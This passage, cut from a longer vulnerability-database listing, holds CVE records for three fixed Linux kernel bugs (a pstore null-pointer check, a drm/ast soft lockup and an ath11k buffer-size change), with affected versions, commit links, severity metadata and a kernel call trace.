            "url": "https://git.kernel.org/stable/c/635594cca59f9d7a8e96187600c34facb8bc0682"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ec7256887d072f98c42cdbef4dcc80ddf84c7a70"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6f9f2e498eae7897ba5d3e33908917f68ff4abcc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/98bc7e26e14fbb26a6abf97603d59532475e97f8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-35940",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T15:01:33.845156Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-476",
                "description": "CWE-476 NULL Pointer Dereference",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-05T15:42:36.316Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/pstore/zone.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "98e2b97acb875d65bdfc75fc408e67975cef3041",
              "status": "affected",
              "version": "d26c3321fe18dc74517dc1f518d584aa33b0a851",
              "versionType": "git"
            },
            {
              "lessThan": "0ff96ec22a84d80a18d7ae8ca7eb111c34ee33bb",
              "status": "affected",
              "version": "d26c3321fe18dc74517dc1f518d584aa33b0a851",
              "versionType": "git"
            },
            {
              "lessThan": "635594cca59f9d7a8e96187600c34facb8bc0682",
              "status": "affected",
              "version": "d26c3321fe18dc74517dc1f518d584aa33b0a851",
              "versionType": "git"
            },
            {
              "lessThan": "ec7256887d072f98c42cdbef4dcc80ddf84c7a70",
              "status": "affected",
              "version": "d26c3321fe18dc74517dc1f518d584aa33b0a851",
              "versionType": "git"
            },
            {
              "lessThan": "6f9f2e498eae7897ba5d3e33908917f68ff4abcc",
              "status": "affected",
              "version": "d26c3321fe18dc74517dc1f518d584aa33b0a851",
              "versionType": "git"
            },
            {
              "lessThan": "98bc7e26e14fbb26a6abf97603d59532475e97f8",
              "status": "affected",
              "version": "d26c3321fe18dc74517dc1f518d584aa33b0a851",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/pstore/zone.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.8"
            },
            {
              "lessThan": "5.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.155",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.86",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.155",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.86",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\npstore/zone: Add a null pointer check to the psz_kmsg_read\n\nkasprintf() returns a pointer to dynamically allocated memory\nwhich can be NULL upon failure. Ensure the allocation was successful\nby checking the pointer validity."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:35:54.955Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/98e2b97acb875d65bdfc75fc408e67975cef3041"
        },
        {
          "url": "https://git.kernel.org/stable/c/0ff96ec22a84d80a18d7ae8ca7eb111c34ee33bb"
        },
        {
          "url": "https://git.kernel.org/stable/c/635594cca59f9d7a8e96187600c34facb8bc0682"
        },
        {
          "url": "https://git.kernel.org/stable/c/ec7256887d072f98c42cdbef4dcc80ddf84c7a70"
        },
        {
          "url": "https://git.kernel.org/stable/c/6f9f2e498eae7897ba5d3e33908917f68ff4abcc"
        },
        {
          "url": "https://git.kernel.org/stable/c/98bc7e26e14fbb26a6abf97603d59532475e97f8"
        }
      ],
      "title": "pstore/zone: Add a null pointer check to the psz_kmsg_read",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35940",
    "datePublished": "2024-05-19T10:10:45.582Z",
    "dateReserved": "2024-05-17T13:50:33.131Z",
    "dateUpdated": "2026-01-05T10:35:54.955Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35952 (GCVE-0-2024-35952)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:41 – Updated: 2025-05-04 09:09

Title

drm/ast: Fix soft lockup

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/ast: Fix soft lockup There is a while-loop in ast_dp_set_on_off() that could lead to infinite-loop. This is because the register, VGACRI-Dx, checked in this API is a scratch register actually controlled by a MCU, named DPMCU, in BMC. These scratch registers are protected by scu-lock. If suc-lock is not off, DPMCU can not update these registers and then host will have soft lockup due to never updated status. DPMCU is used to control DP and relative registers to handshake with host's VGA driver. Even the most time-consuming task, DP's link training, is less than 100ms. 200ms should be enough.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/8a6fea3fcb577a543…
	https://git.kernel.org/stable/c/a81b2acd43e24e419…
	https://git.kernel.org/stable/c/35768baf0fdfc47ed…
	https://git.kernel.org/stable/c/bc004f5038220b189…

Impacted products

Vendor

Product

Version

Linux

Affected: 594e9c04b5864b4b8b151ef4ba9521c59e0f5c54 , < 8a6fea3fcb577a543ef67683ca7105bde49a38fb (git)
Affected: 594e9c04b5864b4b8b151ef4ba9521c59e0f5c54 , < a81b2acd43e24e419f65df97348c76a5a1496066 (git)
Affected: 594e9c04b5864b4b8b151ef4ba9521c59e0f5c54 , < 35768baf0fdfc47ede42d899506bad78450e9294 (git)
Affected: 594e9c04b5864b4b8b151ef4ba9521c59e0f5c54 , < bc004f5038220b1891ef4107134ccae44be55109 (git)

Linux

Affected: 5.19
Unaffected: 0 , < 5.19 (semver)
Unaffected: 6.1.87 , ≤ 6.1.* (semver)
Unaffected: 6.6.28 , ≤ 6.6.* (semver)
Unaffected: 6.8.7 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.044Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8a6fea3fcb577a543ef67683ca7105bde49a38fb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a81b2acd43e24e419f65df97348c76a5a1496066"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/35768baf0fdfc47ede42d899506bad78450e9294"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bc004f5038220b1891ef4107134ccae44be55109"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35952",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:40:45.917761Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:32:48.783Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/ast/ast_dp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "8a6fea3fcb577a543ef67683ca7105bde49a38fb",
              "status": "affected",
              "version": "594e9c04b5864b4b8b151ef4ba9521c59e0f5c54",
              "versionType": "git"
            },
            {
              "lessThan": "a81b2acd43e24e419f65df97348c76a5a1496066",
              "status": "affected",
              "version": "594e9c04b5864b4b8b151ef4ba9521c59e0f5c54",
              "versionType": "git"
            },
            {
              "lessThan": "35768baf0fdfc47ede42d899506bad78450e9294",
              "status": "affected",
              "version": "594e9c04b5864b4b8b151ef4ba9521c59e0f5c54",
              "versionType": "git"
            },
            {
              "lessThan": "bc004f5038220b1891ef4107134ccae44be55109",
              "status": "affected",
              "version": "594e9c04b5864b4b8b151ef4ba9521c59e0f5c54",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/ast/ast_dp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.19"
            },
            {
              "lessThan": "5.19",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.87",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.28",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.87",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.28",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.7",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/ast: Fix soft lockup\n\nThere is a while-loop in ast_dp_set_on_off() that could lead to\ninfinite-loop. This is because the register, VGACRI-Dx, checked in\nthis API is a scratch register actually controlled by a MCU, named\nDPMCU, in BMC.\n\nThese scratch registers are protected by scu-lock. If suc-lock is not\noff, DPMCU can not update these registers and then host will have soft\nlockup due to never updated status.\n\nDPMCU is used to control DP and relative registers to handshake with\nhost\u0027s VGA driver. Even the most time-consuming task, DP\u0027s link\ntraining, is less than 100ms. 200ms should be enough."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:09:06.589Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/8a6fea3fcb577a543ef67683ca7105bde49a38fb"
        },
        {
          "url": "https://git.kernel.org/stable/c/a81b2acd43e24e419f65df97348c76a5a1496066"
        },
        {
          "url": "https://git.kernel.org/stable/c/35768baf0fdfc47ede42d899506bad78450e9294"
        },
        {
          "url": "https://git.kernel.org/stable/c/bc004f5038220b1891ef4107134ccae44be55109"
        }
      ],
      "title": "drm/ast: Fix soft lockup",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35952",
    "datePublished": "2024-05-20T09:41:46.656Z",
    "dateReserved": "2024-05-17T13:50:33.135Z",
    "dateUpdated": "2025-05-04T09:09:06.589Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35938 (GCVE-0-2024-35938)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2025-05-04 09:08

Title

wifi: ath11k: decrease MHI channel buffer length to 8KB

Summary

In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: decrease MHI channel buffer length to 8KB Currently buf_len field of ath11k_mhi_config_qca6390 is assigned with 0, making MHI use a default size, 64KB, to allocate channel buffers. This is likely to fail in some scenarios where system memory is highly fragmented and memory compaction or reclaim is not allowed. There is a fail report which is caused by it: kworker/u32:45: page allocation failure: order:4, mode:0x40c00(GFP_NOIO|__GFP_COMP), nodemask=(null),cpuset=/,mems_allowed=0 CPU: 0 PID: 19318 Comm: kworker/u32:45 Not tainted 6.8.0-rc3-1.gae4495f-default #1 openSUSE Tumbleweed (unreleased) 493b6d5b382c603654d7a81fc3c144d59a1dfceb Workqueue: events_unbound async_run_entry_fn Call Trace: <TASK> dump_stack_lvl+0x47/0x60 warn_alloc+0x13a/0x1b0 ? srso_alias_return_thunk+0x5/0xfbef5 ? __alloc_pages_direct_compact+0xab/0x210 __alloc_pages_slowpath.constprop.0+0xd3e/0xda0 __alloc_pages+0x32d/0x350 ? mhi_prepare_channel+0x127/0x2d0 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814] __kmalloc_large_node+0x72/0x110 __kmalloc+0x37c/0x480 ? mhi_map_single_no_bb+0x77/0xf0 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814] ? mhi_prepare_channel+0x127/0x2d0 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814] mhi_prepare_channel+0x127/0x2d0 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814] __mhi_prepare_for_transfer+0x44/0x80 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814] ? __pfx_____mhi_prepare_for_transfer+0x10/0x10 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814] device_for_each_child+0x5c/0xa0 ? __pfx_pci_pm_resume+0x10/0x10 ath11k_core_resume+0x65/0x100 [ath11k a5094e22d7223135c40d93c8f5321cf09fd85e4e] ? srso_alias_return_thunk+0x5/0xfbef5 ath11k_pci_pm_resume+0x32/0x60 [ath11k_pci 830b7bfc3ea80ebef32e563cafe2cb55e9cc73ec] ? srso_alias_return_thunk+0x5/0xfbef5 dpm_run_callback+0x8c/0x1e0 device_resume+0x104/0x340 ? __pfx_dpm_watchdog_handler+0x10/0x10 async_resume+0x1d/0x30 async_run_entry_fn+0x32/0x120 process_one_work+0x168/0x330 worker_thread+0x2f5/0x410 ? __pfx_worker_thread+0x10/0x10 kthread+0xe8/0x120 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x34/0x50 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1b/0x30 </TASK> Actually those buffers are used only by QMI target -> host communication. And for WCN6855 and QCA6390, the largest packet size for that is less than 6KB. So change buf_len field to 8KB, which results in order 1 allocation if page size is 4KB. In this way, we can at least save some memory, and as well as decrease the possibility of allocation failure in those scenarios. Tested-on: WCN6855 hw2.0 PCI WLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3.6510.30

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/805a1cdde82fec00c…
	https://git.kernel.org/stable/c/6597a6687af54e2cb…
	https://git.kernel.org/stable/c/138fdeac75fb7512a…
	https://git.kernel.org/stable/c/ae5876b3b7b2243d8…
	https://git.kernel.org/stable/c/1cca1bddf9ef08050…

Impacted products

Vendor

Product

Version

Linux

Affected: d5c65159f2895379e11ca13f62feabe93278985d , < 805a1cdde82fec00c7471a393f4bb437b2741559 (git)
Affected: d5c65159f2895379e11ca13f62feabe93278985d , < 6597a6687af54e2cb58371cf8f6ee4dd85c537de (git)
Affected: d5c65159f2895379e11ca13f62feabe93278985d , < 138fdeac75fb7512a7f9f1c3b236cd2e754af793 (git)
Affected: d5c65159f2895379e11ca13f62feabe93278985d , < ae5876b3b7b2243d874e2afa099e7926122087a1 (git)
Affected: d5c65159f2895379e11ca13f62feabe93278985d , < 1cca1bddf9ef080503c15378cecf4877f7510015 (git)

Linux

Affected: 5.6
Unaffected: 0 , < 5.6 (semver)
Unaffected: 5.15.155 , ≤ 5.15.* (semver)
Unaffected: 6.1.86 , ≤ 6.1.* (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35938",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-28T19:33:50.434855Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:22.305Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.059Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/805a1cdde82fec00c7471a393f4bb437b2741559"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6597a6687af54e2cb58371cf8f6ee4dd85c537de"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/138fdeac75fb7512a7f9f1c3b236cd2e754af793"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ae5876b3b7b2243d874e2afa099e7926122087a1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1cca1bddf9ef080503c15378cecf4877f7510015"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireless/ath/ath11k/mhi.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "805a1cdde82fec00c7471a393f4bb437b2741559",
              "status": "affected",
              "version": "d5c65159f2895379e11ca13f62feabe93278985d",
              "versionType": "git"
            },
            {
              "lessThan": "6597a6687af54e2cb58371cf8f6ee4dd85c537de",
              "status": "affected",
              "version": "d5c65159f2895379e11ca13f62feabe93278985d",
              "versionType": "git"
            },
            {
              "lessThan": "138fdeac75fb7512a7f9f1c3b236cd2e754af793",
              "status": "affected",
              "version": "d5c65159f2895379e11ca13f62feabe93278985d",
              "versionType": "git"
            },
            {
              "lessThan": "ae5876b3b7b2243d874e2afa099e7926122087a1",
              "status": "affected",
              "version": "d5c65159f2895379e11ca13f62feabe93278985d",
              "versionType": "git"
            },
            {
              "lessThan": "1cca1bddf9ef080503c15378cecf4877f7510015",
              "status": "affected",
              "version": "d5c65159f2895379e11ca13f62feabe93278985d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireless/ath/ath11k/mhi.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.6"
            },
            {
              "lessThan": "5.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.155",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.86",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.155",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.86",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath11k: decrease MHI channel buffer length to 8KB\n\nCurrently buf_len field of ath11k_mhi_config_qca6390 is assigned\nwith 0, making MHI use a default size, 64KB, to allocate channel\nbuffers. This is likely to fail in some scenarios where system\nmemory is highly fragmented and memory compaction or reclaim is\nnot allowed.\n\nThere is a fail report which is caused by it:\nkworker/u32:45: page allocation failure: order:4, mode:0x40c00(GFP_NOIO|__GFP_COMP), nodemask=(null),cpuset=/,mems_allowed=0\nCPU: 0 PID: 19318 Comm: kworker/u32:45 Not tainted 6.8.0-rc3-1.gae4495f-default #1 openSUSE Tumbleweed (unreleased) 493b6d5b382c603654d7a81fc3c144d59a1dfceb\nWorkqueue: events_unbound async_run_entry_fn\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x47/0x60\n warn_alloc+0x13a/0x1b0\n ? srso_alias_return_thunk+0x5/0xfbef5\n ? __alloc_pages_direct_compact+0xab/0x210\n __alloc_pages_slowpath.constprop.0+0xd3e/0xda0\n __alloc_pages+0x32d/0x350\n ? mhi_prepare_channel+0x127/0x2d0 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814]\n __kmalloc_large_node+0x72/0x110\n __kmalloc+0x37c/0x480\n ? mhi_map_single_no_bb+0x77/0xf0 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814]\n ? mhi_prepare_channel+0x127/0x2d0 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814]\n mhi_prepare_channel+0x127/0x2d0 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814]\n __mhi_prepare_for_transfer+0x44/0x80 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814]\n ? __pfx_____mhi_prepare_for_transfer+0x10/0x10 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814]\n device_for_each_child+0x5c/0xa0\n ? __pfx_pci_pm_resume+0x10/0x10\n ath11k_core_resume+0x65/0x100 [ath11k a5094e22d7223135c40d93c8f5321cf09fd85e4e]\n ? srso_alias_return_thunk+0x5/0xfbef5\n ath11k_pci_pm_resume+0x32/0x60 [ath11k_pci 830b7bfc3ea80ebef32e563cafe2cb55e9cc73ec]\n ? srso_alias_return_thunk+0x5/0xfbef5\n dpm_run_callback+0x8c/0x1e0\n device_resume+0x104/0x340\n ? __pfx_dpm_watchdog_handler+0x10/0x10\n async_resume+0x1d/0x30\n async_run_entry_fn+0x32/0x120\n process_one_work+0x168/0x330\n worker_thread+0x2f5/0x410\n ? __pfx_worker_thread+0x10/0x10\n kthread+0xe8/0x120\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x34/0x50\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1b/0x30\n \u003c/TASK\u003e\n\nActually those buffers are used only by QMI target -\u003e host communication.\nAnd for WCN6855 and QCA6390, the largest packet size for that is less\nthan 6KB. So change buf_len field to 8KB, which results in order 1\nallocation if page size is 4KB. In this way, we can at least save some\nmemory, and as well as decrease the possibility of allocation failure\nin those scenarios.\n\nTested-on: WCN6855 hw2.0 PCI WLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3.6510.30"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:08:49.797Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/805a1cdde82fec00c7471a393f4bb437b2741559"
        },
        {
          "url": "https://git.kernel.org/stable/c/6597a6687af54e2cb58371cf8f6ee4dd85c537de"
        },
        {
          "url": "https://git.kernel.org/stable/c/138fdeac75fb7512a7f9f1c3b236cd2e754af793"
        },
        {
          "url": "https://git.kernel.org/stable/c/ae5876b3b7b2243d874e2afa099e7926122087a1"
        },
        {
          "url": "https://git.kernel.org/stable/c/1cca1bddf9ef080503c15378cecf4877f7510015"
        }
      ],
      "title": "wifi: ath11k: decrease MHI channel buffer length to 8KB",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35938",
    "datePublished": "2024-05-19T10:10:44.279Z",
    "dateReserved": "2024-05-17T13:50:33.131Z",
    "dateUpdated": "2025-05-04T09:08:49.797Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35909 (GCVE-0-2024-35909)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:35 – Updated: 2025-05-04 09:08

Title

